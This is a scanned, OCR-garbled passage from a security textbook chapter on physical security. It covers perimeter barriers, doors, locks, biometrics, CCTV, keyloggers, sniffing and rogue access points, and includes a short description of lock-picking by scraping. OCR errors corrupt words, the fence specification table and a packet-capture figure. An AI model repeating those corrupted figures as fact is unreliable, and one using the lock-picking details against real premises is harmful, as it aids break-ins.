route them to a user’s e-mail. While it may be argued that this
is better than a fax machine, it is not enough to secure the trans-
mission of con lid en lia I information by fax. As an additional and
more robust level of security, activity logs and exception reports
should be collected to monitor for potential security problems.

In today’s world, more companies are reliant on a technology
known as private branch exchange I PBX) for intra office phone
communication, These devices make attractive targets for an
attacker, and if mis con figured have the capability to be hacked;
under the right conditions, it is possible that an attacker can
make anonymous and free phone calls. To secure this portion
of the communication infrastructure, default passwords need
to be changed, and remote maintenance must be restricted.
These systems are not usually run by security! 1 professionals and
may not be as secure as the network infrastructure. Individuals
that target such devices are known as phreakers.

A rapidly growing technology, Voice over IP (VoIP) is more than likely something you will
have to address in your security planning. VoIP allows the placing of telephone calls over
compuler networks and the Internet. VoIP has the ability to transmit voice signals as data
packets over the network in real-time and provide the same level of service as you would

Because voice is transmitted over the network as delta p tickets much like any other
data, it is susceptible to most of the attacks that affect regular data transmission, Attacks
such as packet sniffing and capture can easily capture phone calls transmitted over the
network; in fact, due to the sheer volume of calls that may be placed at any one time,
a single a it tick can intercept and affect numerous calls.

CHAPTER 4 Physical Security

Physical Area Controls

87

When looking Eit the overall security stance of an organization, you have numerous
controls to use. each for a different reason. In the physical world, the first controls that
someone wishing to cause harm is likely to encounter arc those that line the perimeter
of an organization. This perimeter is much like the moat or walls around a castle, designed
to provide both a deterrent and a formidable obstacle in the event of an attack. When
assessing an organization, pay attention to those structures and controls that extend
in and around an organization’s assets or facilities. Every control or structure observed
should provide protection either to delay or deter an attack, with the ultimate goal of
stopping unauthorized access. While it is possible that, in some cases, a determined
attacker will make every effort to bypass the co u n term eas u res in the first layer, additional
layers working with and supporting the perimeter defenses should provide valuable
detection and deterrent functions. During the construction of new facilities, the security
professional should get involved early to give advice on what measures can be imple-
mented. It is more than likely, however, that the security professional will arrive on scene
long after construction of facilities has been completed. In these cases, a thorough site
survey should be conducted with the goal of assessing the current protection offered.
If tasked with performing a site survey, do not overlook the fact that natural geographic
features can and do provide protection as well as the potential to hide individuals with
malicious intent from detection. When surveying an existing facility, consider items
such as natural boundaries at the location and fences or walls around the site. Common
physical area controls placed at the perimeter of the facility can include many types
of physical barriers that will physically and psychologically deter:

■ Fences

• Perimeter intrusion detection systems (FIDS)
• Gates

• • Bollards

• Warning signs and notices

■ Trees and foliage

Fences

Fences are one of the physical boundaries that provide the most visible and imposing
deterrent. Depending on the construction, placement, and type of fence in place, it may
deter only the casual intruder or a more determined individual. As fences change in
construction, height, and even color, they aiso cEin provide a psychological deterrent.
For example, consider an eight-foot iron fence with thick bars painted flat black: such
a barrier can definitely represent a psychological deterrent. Ideally, a fence should put
limit an intruder’s access to a facility as well as provide a psychological barrier.

88

PART 1 Hacker Techniques and Tools

Walls in History

Almost everyone has heard about the Great Wall of China, built to keep out the Mongols.
Two other examples from history of waifs that served as effective barriers are the Berlin Wall
and Hadrian’s Wall. The Berlin Wall was put in place to stop the exodus of people from
East Germany to the West. Until it was torn down in 1989, the physical and psychological
deterrent oi this barrier was obvious to anyone who looked upon the structure. In its final
form, the Berlin Wall was a miles-long concrete and steel barrier line that was supplemented
with land mines, dogs r guards, antitank barriers, and other mechanisms designed to strike
fear into people and prevent escape attempts. Of course, the Berlin Wall did not prevent
the occasional escape attempt (100 to 200 people died trying to make their way into the
West over the wall).

mark the edge of his territory. Hadrian’s Wall was an impressive engineering marvel,
stretching across a large swath of northern Britain, designed to k.eep out the “barbarians”
and serve as a physical manifestation of the edge of the empire. Ultimately, as the empire
decayed and fell into ruin, the wall went unmanned, but not before serving its purpose
for some time.

Depending on the company or organization involved, the goal of erecting a fence may
vary from stopping casual intruders to providing a formidable b timer to entry. Fences
work well at preventing unauthorized individuals from gaining Eiccess to specific areas,
but also force individuals that have or want access to move to specific chokepoints to enter
the facility. When determining the type of fence to use. it is important to gel an idea of
what the organization may need to satisfy the goals of the security plan. To get a better
idea, review Table 4-1, which contains a sampling of fence types and the construction and
design of each. Fences should be eight feet long or greater to deter determined intruders.

table 4-1 Fence types.

TYPE SECURITY

MESH

GAUGE

A Extreme High Sec u r ity

3 fa inch

1 1 gauge

li Very High Security

1 inch

9 gauge

C High Security

1 inch

1 1 gauge

D Greater Security

2 inch

6 gauge

E Normal Fencing

2 inch

9 gauge

CHAPTER 4 Physical Security

In situations where security is even more of a concern, and just the placement
of a fence may not be enough, it is possible to layer other protective systems. For
example, a perimeter intrusion and detection assessment system (PIDA) can be used.
This special fencing system works as an intrusion detection system (IDS) in that it has
sensors which can detect intruders. While these systems are expensive, they offer an
enhanced level of protection over standard fences., In addition to cost, the downside
of these systems is that it is possible that they may produce false positives due to
environmental factors such as a stray deer, high winds, or other natural events.

Gates

Fences are an effective barrier* but they must work in concert with other security
measures and structures. A gate is a chokepoint or a point where alt traffic must
enter or exit the facility. All gates are not created equal, however, and if you select
the incorrect one, you won’t get proper security. In fact, choosing the incorrect gate
can even detract from an ol her wise effective security measure, A correctly chosen
lj, l 1 1 l”‘ provides iio el iectivc deter renl and ti barrier lluil will slow down an in J ruder,
whereas an incorrectly chosen harrier may not deter anyone but the casual intruder.
UL Standard number 52 5 describes gate requirements. Gates are divided into the
fo llowin g fo u r c I a ss i lie a M t >n s :

• Residential or Class 1 — These are ornamental in design and offer little
protection from intrusion.

Commercial or Class 2 — These are of somewhat heavier construction
and fall in the range of three to four feet in height.

• Industrial or Class 3 — These are in the range of six to seven feet in height
and are of heavier construction, including chain link construction.

Restricted Access or Class 4 — These meet or exceed a height of eight feet
and are of heavier construction — iron bars or concrete and similar materials.
Gates in this category can include enhanced protective measures including
barbed wire.

Want to Know More?

For more detailed information on site security consider the many resources available
on this topic. One is RFC 2196_Site Security Handbook. This document provides practical
guidance to administrators seeking to secure critical assets. You can read more at:
http-Jfwww. fsqs.org/rfc5/rfc2 1 9&.html#ixzzQiPiLB2vn.

PART 1 Hacker Techniques arid Tools

Bo ardb may not always be as visible as a steel post or concrete barrier In some situations the
bollards are cleverly hidden using landscaping or subtle design cues. For example, some locations
(for example, malls or shopping centers) will place large concrete planters with trees or some
other form of plants or decorations in front of entry points vulnerable to vehicle attacks. Another
example is a retailer like Target, which often uses large concrete balls painted red in front of the
main doors. While most customers may think of these as decorations or a representation of the
Target logo r they are actually a form of bollard. Typically, bollards are hidden to be less imposing
to customers, but still serve the designated function.

Bollards

Bollards are devices that can take many farms, but the goal is the same: prevent entry
into designated areas by motor vehicle traffic. To get an idea of a location where bollards
wonld be ideal and how they function, consider an electronics superstore such as Best
Buy, In this case, lots of valuable merchandise is present and someone could very easily
back a truck through the front doors after hours, load up on merchandise, and drive away
quickly before law enforcement arrives. In the same situation, the placement of heavy
steel posts or concrete barriers would stop a motor vehicle from even reaching the doors.
Many companies use bollards to prevent vehicles from going into areas in which they are
not permitted. Bollards, which can be concrete or steel, block vehicular traffic or protect
areas where pedestrians may be entering or leaving buildings. While fences act as a first
line of defense, bollards are a close second as they can deter individuals from ramming
a facility with a motor vehicle.

Bollards can come in many shapes, sizes, and types. Some are permanent, while
others pop up as needed to block a speeding car from ramming a building or ram -raiding.
Ram -raiding is a type of smash and grab burglary in which a heavy vehicle is driven
through the windows or doors of a closed shop, usually one selling electronics or jewelry,
to quickly rob it.

Facility Controls

In addition to bollards, other security controls offer protection, and each has to be
evaluated to ensure that security requirements are being met. These security controls,
or facility controls, come in the form of doors, windows, and any other entry points
Into a facility. The weakest point of a structure is generally the first to be attacked. This
means doors, windows, roof access, fire escapes, delivery access, and even chimneys
are targets for attackers. In fact, anyone who has watched programs such as COPS or
other iypcs of reality shows based on law enforcement long enough htis probably seen
a handful of “dumb” criminals who got stuck trying to get into a chimney. This should
serve as a reminder that you need strong facility controls and that you must provide only

CHAPTER 4 Physical Security

91

the minimum amount of access required and restrict no authorized individuals from secure
areas. Some of the ways to achieve these goals is by examining and assessing the following:

• Doors, mantraps, and turnstiles
• Wa Lis, ceil ing s« and floo rs

• Windows

• Guards and dogs

• Construction

• Doors, Mantraps, and Turnstiles

Cxcept for the majority of exterior doors, most doors are not designed or placed with
security in mind. While doors in li horn v environment that are not designed with security
as a goal are fine* the same cannot be said for those in a business environment, Business
environments should always consider solid core doors as the primary option for doors
unless otherwise spedlied. The advantages between solid and hollow are obvious when
you consider just how easily hollow core doors can be defeated. Consider that an attacker
with a good pair of boots on can kick through a hollow core door quite easily, A door
designed for security will be very solid and durable and have hardened hardware. While
the tendency for businesses to cut costs wherever possible is a known fact, it should be
discouraged when purchasing doors by selecting the type of door only after security needs
have been assessed. Low-cost doors are easy to breach, kick in, smash, or compromise.
A solid core door should always be used lor tin 1 protect Ion of a server room or other
critical assets. Doors also need to have a tire rating assigned to them, which is another
item to be considered before installing. Doors come in many configurations, including
the following:

• Industrial doors
• V ehic I e acc ess d oors

• Bulletproof doors

• Vault doors

• Is just having a well-selected door the end of the problem?
Absolutely not; you must consider the frame that the door is
attached to. A good door connected to a poorly designed or
constructed frame can be the Achilles heel of an otherwise
good security mechanism. During a security review, it is also
importan t to examine not only the doors in place but also the
hardware used to attach the door to the frame and the frame
itself. Consider the fact that something lis simple as installing
the hinges incorrectly to a door and frame can make them
easy for a potential intruder with a screwdriver to bypass.
Critical areas secured with doors should be hinged to the inside,
This type of design makes it much harder for a criminal to gain
access. This means that hinges and strike plates must be secure.

NOTE

While the importance of selecting
the correct door is not something
to be overlooked by the security
professional, also understand that
proper evaluation may require the
services of a specialist. Because an
information security professional
doesn’t usually have a background
in construction or carpentry, it
is important to consult with a
specialist who better understands
the issues Involved.

PART 1 Hacker Techniques and Tools

Some doors are hinged on the outside and are designed to open out. Exterior doors
are a good example of this. While the hinges are protected, the open -out feature of the
door provides tin invaluable safeguard against people getting trapped in a building in
the event of a fire or other emergency. These doors are more expensive because they are
harder to install and remove. Common places to observe these types of doors are shopping
malls and other public facilities,, specifically the exit doors. In some cases, exit doors are
even equipped with a panic bar that can help when large crowds rush the door and need
to leave quickly.

Companies should also be concerned about the flow of traffic into the facility. This
is the type of situation where a device known as a mantrap can prove helpful A mantrap
is a structure that replaces a normal single door with a phone booth-sized object with
a door on each side. When an individual enters the mantrap there is only enough space
for one person at a time, and only one door can be opened at a time. The structure’s
design allows individuals to be screened via a camera or code to ensure that every indivi-
dual is supposed to be entering and (in some cases) exiting the area. While mantraps
are designed to regulate the How of traffic in and out of an area, they specifically stop
piggybacking, which is the practice of one individual actually opening the door to let
several enter.

Another type of physical control device in common usage is the turnstile, which is
commonly used at sporting events, subways, and amusement parks. Turnstiles can be
used to slow the flow of traffic into areas or even ensure that individuals are properly
screened and authenticated prior to entering an area.

Walls, Ceilings, and Floors

Working In concert with doors are the walls that the doors or mantraps Eire embedded
into, A reinforced wall can keep a determined attacker from entering an area through
any point other than the defined doors. On the other hand, a poorly constructed wall may
present no obstacle at all and allow an intruder to kick through. Construction of walls
should take into consideration several factors in addition to security, such as the capability
to slow the spread of lires. Walls should run from the slab to the roof. Consider one of the
more common mistakes that can be a detriment to security: the false wall. These are walls
that run from the floor up to the ceiling, but the ceiling isn’t real; it’s but a drop ceiling
that has a good amount of space between it and the roof. An attacker needs only a table,,
a chair, or a friend for a foothold to push up the ceiling tile and climb over. If asked to
perforin a physical security assessment of a data center or other type of high value physical
assets check to see that the wall runs past the drop ceiling. Also tap on the wall gently
and check to see whether it is hollow or of a solid construction.

For ceilings, the weight-be el ring load and fire ratings must be considered. For dropped
ceilings, the walls should extend above the ceiling, especially in sensitive areas. Any
ceiling-mounted air ducts should be small enough to prevent an intruder from crawling

CHAPTER 4 Physical Security

93

l h rough litem. The siah of Lhe facility needs to have the proper
weight load, lire rating, and drains. When dealing with raised
floors, you will want to make sure the flooring is. grounded and
nonconducting, In areas with raised floors, the walls should
extend below the false floor.

NOTE

A com in on decorative feature

is the glass block wall commonly
seen in locations such as doctors’
offices or lobbies, While such

Windows

Windows serve several purposes in any building or workplace:
“‘opening up* the office to let more light in and giving the

structures and designs do look

attractive, they can very easily be
seen through and a kick of a boot
can get through most designs.

inhabitants a look at the world outside. But what Eibout the
security aspect? While windows let people enjoy the view,

security can never be overlooked. Depending on the placement and use of windows,
anything from tinted to shatterproof windows may be required to ensure that security
is preserved. It is also important to consider that in some situations the windows may
need to be enhanced through the use of sensors or alarms. Window types include
c he following:

• Standard — The lowest level of protection. It’s cheap, but easily shattered
and destroyed.

Polycarbonate acrylic — Much stronger than standard glass, this type of plastic
offers superior protection.

• Wire reinforced — Adds shatterproof protection and makes it harder for an intruder
to break and access.

Laminated — Similar to what is used in an automobile. By adding a laminate
between layers of glass, the strength of the glass is increased and shatter potential
is decreased.

• Solar film — Provides a moderate level of security and decreases shatter potential*
• Security film Used to increase the strength of the glass in case of breakage
or explosion.

• Guards and Dogs

For areEis where proper doors, fences, gates, and other structures cannot offer the
required security, other options include guards or dogs. Guards can serve several functions
just by being present: guards can be very real deterrents in addition to introducing the
” human element” of security — they have the ability to make decisions and think through
situations. While computerized systems can provide vital security on the physical side,
such systems have not reached the level where the human element can be replaced.
Guards add discernment to on site security.

PART 1 Hacker Techniques and Tools

Of course, as the old saying goes. ‘”You don’t get something for nothing” and guards
are no exception to this old rule. Guards need lo be screened before hiring, background
checks and criminal background need to be performed, and, if needed, security clearances
must be obtained, Interestingly enough, however, increased technology has in part driven
the need for security guards. More and more businesses have closed-circuit television
(CCTV), premise control equipment, intrusion detection systems, and other computerized
surveillance devices. Guards can monitor such systems. They can fill dual roles, and
monitor, greet, and escort visitors, too.

Guards cost money. However, if a company does not have the money for a guard, there
are other options. Dogs have been used for centuries for perimeter security. Breeds such as
German shepherds guard facilities and critical assets. While it is true that dogs are loyal,
obedient, and steadfast, they are not perfect and might possibly bite or harm the wrong
person because they do not have the level of discernment that human beings possess.
Because of these factors, dogs are usually restricted to exterior premise control and
should be used with caution.

Construction

Construction of a facility has as much to do with the environment in which the facility
is to be located as does the security it will be responsible for maintaining. As an example,
a facility built in Tulsa, Oklahoma, has much different requirements from one built
in Anchorage, Alaska, One is concerned with tornadoes; the other with snowstorms.
The security professional is expected in most cases to provide input on the design or
construction of a new facility or the functionality of a preexisting facility that the
company is considering. When this situation arises consider the following factors:

• What are the unique physical security concerns of the organization’s operations?

• Do redundancy measures exist I such as backup power or coverage by multiple
telecom providers)?

• Is the location particularly vulnerable to riots or terrorism?

• Are there any specific n a t u ral/e n vi ron me n tal concerns for the specific region
in which construction is being considered?

• Is the proposed construction close lo military bases, train tracks, hazardous
chemical production areas, or other hazards?

• Is the construction planned in high crime neighborhoods?

r How close is the proposed construction to emergency services such as the hospital,
fire department, and police station?

Personal Safety Controls

The bulk of what has been discussed up to this point has focused on the protection
of assets such as computers, facilities and data; however, the human factor has been
overlooked. Any security plan must address the protection and security of all assets.

CHAPTER 4 Physical Security

and ibis absolutely includes both silicon-based assets and carbon-based ones. There is
a wide assortment of technologies specifically designed to protect not only people but
also the organization itself, including the following:

■ Lighting

• Alarms

• CCTV

Lighting

Lighting is perhaps one of the lowest-cost security controls that can be implemented by
an organization. Lighting can provide a welcome addition to locations such as parking
gEirages and huiLJing perimeters. Consider the tact iluit wiien pro per L\ phurd. Ugh liny, oati
eliminate shadows and the spots that cameras or guards can’t monitor, as well as reduce
the places in which an intruder can hide. Effective lighting means the system is designed
to put the light where it is needed and in the proper wattage as appropriate, Lights are
designed for specific types of applications. Some of the more common types of lights
include these:

■ Continuous — Fixed lights arranged to Hood an area with overlapping cones
of light (most common)

• Standby — Randomly turned on to create an impression of activity

Movable — Manually operated movable search lights; used as needed to augment
continuous or standby lighting

• Emergency — Can duplicate any or all of the previous lights; depends on
an alternative power source

Two issues that occur with lighting are over lighting and glare. Too much light, or
overly bright lights, can bleed over to the adjacent owner’s property and be a source of
complaints. Too much light can also lead to a false sense of security because a company
may feel that because all areas are lit, intrusion is unlikely. Additionally, when lighting
is chosen incorrectly, it is possible to introduce high levels of idarc. (11 Eire can make it
lough for those tasked with monitoring an area to observe all the activities thai may be
occurring. When placing lighting, avoid any placement that directs the lighting toward
the facility and instead direct the lights toward fences, gates, or other areas of concern
such as access points. Also consider the problems associated with glare when guards are
present; for example, if guards are tasked with checking IDs at a checkpoint into a facility,
ensure that the lights are not directed toward the guards. This offers good glare protection
to the security force and guards.

Alarms and Intrusion Detection

Alarms and physical intrusion detection systems can also increase physical security.
Alarms typically are used to provide an alert mechanism if a potential break-in or tire has
been detected. Alarms can have a combination of audible and visual indicators that allow
people to see and hear the alarm and react to the alert. Alarms are of no use if no one can

96

PA RT 1 H ac ke r Techn iq ues and Too I s

hear or see the alert and respond accordingly. More advanced alarm systems even include
the ability to contact lire or police services if the alarm is activated after business hours,
for example. Of course, a drawback is the simple fact that if an alarm system is tied to the
police or fire department, false alarms could result in being assessed lines.

Additional options that can enhance physical intrusion detection are motion, audio,
infrared wave pattern, and capacitance detection systems. Of these systems, infrared
detection tends to be one of the most common, but I Lice any system, these have both pros
and cons. Infrared systems are expensive and they may be larger than other com pu mhle
devices, but at the same time the systems can detect activity outside the normal visual
range. Another popular form of intrusion detection systems are those devices sensitive
to changes in weight, and such systems may be useful when used with mantraps because
they can detect changes in weight that may signal a thief.

If asked to provide guidance to an organization on what type of IDS to consider imple-
menting, always take the situation In In account. What is important to avoid is placing
a too complex or inappropriate [E)S for the given situation. For example, systems that
detect weight changes may not be as important or may even be completely unnecessary
in situations where theft is nai n concern. Also keep in mind that IDSs arc not foolproof
and are not an excuse for avoiding using common sense or other security controls.
Any guidance on what type of IDS to implement should also mention that human
involvement is essential.

Closed-Circuit TV {CCTV)

Another mechanism that can be used to protect people and potentially deter crime is
CCTV. CCTV usually works in conjunction with guards or other monitoring mechanisms
to extend their capacity. When dealing with surveillance devices, you must understand
factors such as focal length, lens types, depth of Held, and illumination requirements.
As an example, the requirement of a camera that will be placed outside in an area of
varying light is much different from one placed inside In a fixed lighting environment,

Also, there is the issue of focal length, which defines the
camera’s effectiveness in viewing objects from a horizontal
and vertical view. Short focal lengths provide wider angle
views while longer focal lengths provide more narrow views.

When considering placement of CCTV. keep in mind
areas such as perimeter entrances and critical access points.
Activity can be either monitored live by a security officer, or
recorded and reviewed later, if no one is monitoring the CCTV
system t it effectively becomes a detective control because it
will not prevent a crime. In these situations, the organization
is effectively alerted to the crime only after the fact, when the
rec ordings are re v i ewe d ,

1

MOTE

Modern CCTV systems cart provide
agency or organization in the form
of e-mail or other similar methods,
These systems can be said to be
smart in that they can even be
configured in some instances
to send these alerts on ty during
certain hours.

i

CHAPTER 4 Physical Security

Physical Access Controls

97

A physical access control can be defined as any mechanism by which an individual!
can be granted or denied physic til access. One of the oldest forms of etc cess control is
the mechanical lock. Other types of physical access control include ID badges, to kens h
and biometrics.

Locks

Locks, which come in many types, sizes, and shapes* are an effective means of physical
access control. Locks are by far the most widely implemented security control due largely
to the wide range of options available as well as the low costs of the devices.
Lock types include the following:

• Mechanical — Warded and pin and tumbler

• C i p he r — Sm a rt a n d prog r a m m able

Warded locks are the simplest form of mechanical lock. The design of mechanical locks
uses a series of wards that a key must match up to in order to open the lock. While it is the
cheapest type of mechanical lock it is also the easiest to pick. Pin and tumbler locks are
considered more advanced. These locks contain more parts and are harder to pick than
warded locks. When the correct key is inserted into the cylinder of a pin and tumbler lock,
the pins are lifted to the right height so that the device can open or close. More advanced
and technically complex than warded or pin and tumbler locks are cipher locks, which
have a keypad of fixed or random numbers that requires a specific combination to open
the Jock.

Before selecting a lock, consider the tact that not all locks
are alike, and locks come in different grades. The grade of the
lock specifies its level of construction. The three basic grades
of locks are as follows:

Grade 1 — Commercial locks with the highest security

Grade 2 — Light-duty commercial locks or heavy-duty
residential locks

Grade 3 — Consumer locks with the weakest design

NOTE

Although a Grade 3 lock is fine
for use in residential applications,
it is not acceptable for a critical
grade of a lock before using it to
protect the assets of a company.

Lock Picking

While locks are good physical deterrents and work quite well as a delaying mechanism,
a lock can be bypassed through lock picking. Criminals tend to pick locks because it is
a stealthy way to bypass a lock and can make it harder for the victim to determine what
has happened.

98

PA RT 1 H ac ke r Techn iq ties and Too I s

The basic components used to pick locks are these:

• Tension wrenches — Like small, angled Hathead screw-
drivers. They come in various thicknesses and sizes.

• Picks — Just as the name implies, similar to dentist picks:
small angled, and pointed.

Together, these tools can he used to pick ei lock. One example
of a basic technique used to pick a lock is scraping. With this
technique, tension is held on the lock with the tension wrench
while the pins are scraped quickly. Pins are then placed in
a mechanical bind and will he stuck in the unlocked position.
With practice, this can be done quickly so that all the pins
stick and the lock is disengaged.

Tokens and Biometrics

Tokens and biometrics are two ways to control individuals as they move throughout
a facility or attempt to access specific areas. Tokens are available in many types and can
range from basic ID cards to more intelligent forms of authentication systems. Tokens
used for authentication can make an access decision electronically and come in several
different configurations^ including the following:

Active electronic — The access card has the ability to transmit electronic data.
Electronic circuit — The access card has an electronic circuit embedded.

• Magnetic stripe — The access card has a stripe of magnetic material
• Magnetic strip — The access card contains rows of copper strips.

• Contactless cards — The access card communicates with the card reader electronically.

• Con tactless cards do not require the card to be inserted or slid through a reader. These
devices function by detecting the proximity of the card to the sensor. An example of this
technology is radio frequency ID (RFID). R I” 1 1 Ms an extremely small electron ic device that
is com posed oi ei microchip and antenna. Many l\Y\) dev ices are passive devices. Passive
The reader generates an electromagnetic signal that induces a current in the RFID tag.

Another form of authentication is biometrics. Eiometric authentication is based on
a behavioral or physiological characteristic that is unique to tin individual, Eiometric
authentication systems have gained market share because they are seen as a good
replacement for password-based authentication systems, Different bio metric systems
have various levels of accuracy. The accuracy of a biometric device is measured by the
percentage of Type 1 and Type 2 errors it produces. Type 1 errors or false rejections are
reflected by what is known as the false rejection rate (FRR). This is a measurement of the
percentage of individuals who should have been granted, but were not allowed access.
A Type 2 error or false acceptance is reilecled by the false acceptance rate (FAR) which
is a measurement of the percentage of individuals who have gained access but should
not have heen granted such.

fx

NOTE

set, be sure to investigate local
laws on the matter. In some states,
the mere possession of a lock
picking set can be a felony. In
other states, possession of a kick
picking set is not a crime in and of
itself, but using the tools during
the commtsston of a crime is,

CHAPTER 4 Physical Security

Some co mm mi bio metric systems include the following:

Finger scan systems — Widely used, popular, installed in many new laptops

■ Hand geometry systems — Accepted by most users: functions by measuring
the unique geometry of a user’s fingers and hand to identify them

• Palm scan systems — Much like the hand geometry system h except it measures
the creases and ridges of a user for identification
• Retina pattern systems — Very accurate: examines the user’s retina pattern

• Iris recognition — Another eye recognition system that is also very accurate;
it matches the person’s blood vessels on the back of the eye

• Voice recognition — Determines who you are by using voice analysis
Keyboard dynamics — Analyzes the user’s speed and pattern of typing

• No matter what means of authentication you use. a physical access control needs to fit
the situation in which will be applied. As an example, if the processing time of a biometric
system is slow, users tend to just hold the door open for others rather than wait for the
additional processing time. Another example is an iris scanner, which may be installed
at all employee entrances, yet later causes complaints from employees who are physically
challenged or in wheelchairs because they cannot easily use the newly installed system.
Consider who will be using the system and if it may be appropriate given the situation
and user base.

Avoiding Common Thre ats to Physical Security

With so much talk in this chapter of controls and items to look for during an assessment,
it is important to be aware of some of the threats an organization can face.
Some common threats include these:

• Natural/ human/technical threats
• Physical key loggers

• ■ Sniffers

• W irele ss i n terce ption
• Rogue access points

• Natural, Human, and Technical Threats

Every organization must deal with the threats that are present in the environment each
day. Threats can be natural, human, or technical. Natural threats can include items such
as fires, floods, hurricanes, tropical storms, tidal waves, and earthquakes.

Human threats are not always as predictable as natural threats. For example, anyone
living in California knows that earthquakes will Jul. hist they just can’t say when.
However, an organization may expect someone to attempt or even succeed in breaking in
to the company, bui the attempt may never come. The point here is that aside from natural

100

PA RT 1 H ac ke r Techn iq ues and Too I s

disasters, you m ust think of other threats such as hackers who do not issue notices
when an attack is coming. Any organization can be threatened by outsiders or insiders:
people that are apparently trusted or unknown individuals.
Human threats can include the following:

• Theft — Theft of company assets can range from mildly annoying to extremely
damaging, A CEO’s laptop may be stolen from I he hotel lobby; but is the real loss
the laptop or the plans for next year’s new software release?

• Vandalism — From broken windows caused by a teenager just having some
malicious fun to the hacker who decides to change your company’s Web page,
each is destroying company property

• Destruction — This threat can come from insiders or outsiders. Destruction
of physical assets can cost organizations money that was destined to be spent
on other items,

■ Terrorism — This form of threat is posed by individuals or groups that wish
to prove a point or draw attention to a cause

• Accidental — Accidents are bound to happen sooner or later and their effects
can be varied depending on the situation. Damage could range from lost data
or an tut acker obtaining access where they should not have.

Any company can also be at risk due to technical issues, A truck driver can knock down
a power pole in front of the company, or a hard drive in a server might fail, Each can and
will affect the capability of the company to continue to provide needed services. Whenever
a security professional is asked to perform a physical review, don’t neglect physical
controls that are needed to protect against these or any of the various types of issues that
Eire present. Any equipment failure and loss of service can affect the physical security
of the organization.

Physical Keyloggers and Sniffers

Hardware keyloggers are physical devices used to record everything a person types on
the keyboard. These devices are usually installed while the user is away from the desk.
Keystroke loggers can be used for legal or Illegal purposes, such as the following:

» Monitoring employee productivity and computer activity

• Law enforcement

• Illegal spying

Physical keyloggers can store millions of keystrokes on a small device that is plugged
in between the keyboard and the computer. Some keyloggers are built into keyboards.
The process is transparent to the end user and can be detected only by iinding the
keylogger.

CHAPTER 4 Physical Security

101

Key loggers can be the following:

• Attach ed Lo t h e key bo a rd c tib le . as in li n e de vices
• Installed inside standard keyboards

• Inst a lied ins id e re p lacement key bo a rds

• Installed on a system along with other software

• Sniffing is the basis for a large number of network-based attacks.
If attackers can gain access to the network via a physical network
connection, they can begin to capture traffic, Sniffing can be
passive or active. Passive sniffing re ties on a feature of network
cards called “promiscuous mode/” When placed in promiscuous
mode, a network card passes all packets on to the opcraling
system, rather than just those unicast or broadcast to the host.

Active sniffing, on the other hand, relies on injecting packets into the network, causing traffic
thai should not be sent to your system to be sent to your system. Active sniffing was developed
largely in response to switched networks. Snifiing is dangerous in that it allows hackers access
to traffic they should not see. An example of a sniffer capture is shown in Figure 4-1.

j NOTE

Even if the IT or security
is pfanning to use these
devices for legal purposes,
always consult with a lawyer
or with the human resources
department. Use of such devices
in some instances can be a
serious legal issue and expose
the company to legal action.

Efe t. « Q*

,JHiim+ £rV**ft SMalti

ft a a * + 2

‘ J [(■”-. ‘■••'< ■ :

| . Tr*

Sew*

r*»i 1 (40 byt-M on vr\rm r t>0 byt«S capturttl}

t hrn«t ti„ Sr-c: zyxe lc.sffL.,2 1:19: £d (0Q :40: 01: 21:19 ;£d> 4 05 1: ngt tje f • 2 ■■j : 5 E (00: 09: 5b: If :2fc: SSl
Destination; Neto^a r„if ; r
i J B tOQ ; 09 r 5b rlf ; 2 1 * : S EO
Typ=: CokosoO)

Triilir: 0OFFFFFFFF£F

m:ernet proioct)!. Src: 1S2. 16«. 12 3.151 (19 2 .169, 123.1EL), &St E 192. 166,123.101 £192 ,l*a, 12 3,101}
VffrslOrti 4

Different tat pd Services Field: 000 (OSCP 000: default; KM: 000}
Toc.il L
n^th: 40
Identification; 0x62b (651)
rUgi: 5>
«P
Frupervi offset: 0

Ttmr ltv»: 3J

protocol; tcp (0x0*5

source: i«, iei <i«.i&e,i23.ia>

test 1 nation: IK. 16B.123. 101 (192 . 16S. 12 3 . 101)

r.rvnTH?i1gn Control Prgrtocpl, Src Pprt: print pr (511>, 0?t PUTt : 304 (3J0O, S*q: 0, A** : 0, Lr»: 0

■r 1

C’vyg g’> ft if S3 . J, M’ 5;; vy -U „■

0010 00 IB 02 4b 00 00 JO 04 If da cO aft 7b b* cO aS

0020 7t> 61 02 03 Ofi 73 71 10 SO 05 fa 3f 6fa 6C 50 10

&03t> » « «f rt M 06 00 f f Tf ff ff ff

■ i £ . flr “. . W ‘■ – – – C i

1 + + It II I * 4 +I + K

FIGURE 4 1

|H D 1UM fltJ-jut 0

Wireshark sniffer.

102

PART 1 Hacker Techniques and Tools

Wireless Interception and Rogue Access Points

While you will read more about wireless networks and their security vulnerabilities in
Chapter 8, we will mention some of the basics here as a brief introduction. Sniffing is
not restricted to wired networks. Wireless signals emanating from cell phones, wireless
local area networks (WLAKs). Bluetooth devices, and other modern equipment can also
he intercepted and analyzed by an attacker with the right equipment. Even when signals
cannot be intercepted, they can still potentially be jammed. For example, a cell phone
jammer could transmit a signal on the same frequencies that cell phones do and then
prevent all cell phone communication within a given area.

Moving on to other current technologies, the discussion now turns to another wireless
technology: Bluetooth, which is a short-range communication technology that has
been shown to be vulnerable to attack. One such attack is Blue) a eking, which allows an
individual to send unsolicited messages over Bluetooth to other Bluetooth devices, WLANs
are also vulnerable to attacks. These attacks can be categorized into four basic categories:
etivesdropping, open authentication, rogue access points, and denial of service.

Finally, the attacker may attempt to set up a fake access point to intercept wireless
traffic. Such techniques make use of a rogue access point. This fake access point is used
to launch a man -in -the -middle attack. Attackers simply place their own access points
in the same area as users and attempt to get them to log on.

Defense in Depth

NOTE

Another way to think
of defense in depth is as
avoiding putting all your

Something that has been mentioned indirectly a few times already is the concept of
defense in depth. The concept of defense in depth originated from the military and was
seen as a way to delay rather than prevent an attack. As an information security tactic,
it is based on the concept of layering more than one control, These controls can be
physical, administrative, or technical in design. We have looked at a variety of physical
controls in this chapter such as locks, doors, fences, gates, and barriers. Administrative

controls include policies and procedures on (among other things) how
you recruit, hire, manage, and ii re employees. During employment,
administrative controls such as least privilege, separation of duties,
and rotation of duties are a few of the items that must be enforced.
When employees leave or are fired, their access needs to be revoked,
accounts blocked, property returned, and passwords changed.
Technical controls are another piece of defense in depth and can
include items such as encryption, firewalls, and IDS,
For the physical facility, a security professional should strive for a mini mum of three
layers of physical defense. The iirsl line of defense is the building perimeter. Barriers
placed here should delay and deter attacks. Items at this layer include fences, gates, and
bollards. These defenses should not reduce visibility of CCTV and/ or guards. Items such
as shrubs should be IS to 24 inches away from all entry points, and hedges should he
cut six inches below the level of all windows.

CHAPTER 4 Physical Security

103

The second layer of defense is the building exterior: roof, walls, floor, doors, and ceiling.
Windows are a weak point here. Any opening 18 feet or less above the ground should be
